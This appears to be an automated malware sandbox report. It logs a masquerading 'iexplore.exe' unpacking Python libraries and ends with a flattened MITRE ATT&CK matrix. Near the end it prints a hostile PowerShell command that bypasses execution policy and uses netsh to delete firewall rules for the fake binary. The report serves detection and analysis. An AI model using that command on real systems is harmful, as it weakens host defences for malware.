Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\load_config_py3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\load_config_py3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\load_config_py3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\load_config_py3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config-3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config-3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\config-3.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\data\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\data\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\data\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\data\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc\version.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\utils\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies the windows firewall
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: Amcache.hve.22.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.22.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.22.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.22.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts1
Command and Scripting Interpreter		1
Scheduled Task/Job		11
Process Injection		11
Masquerading		OS Credential Dumping121
Security Software Discovery		Remote ServicesData from Local System1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Scheduled Task/Job		1
Scripting		1
Scheduled Task/Job		31
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		41
Virtualization/Sandbox Evasion		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc Filesystem12
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
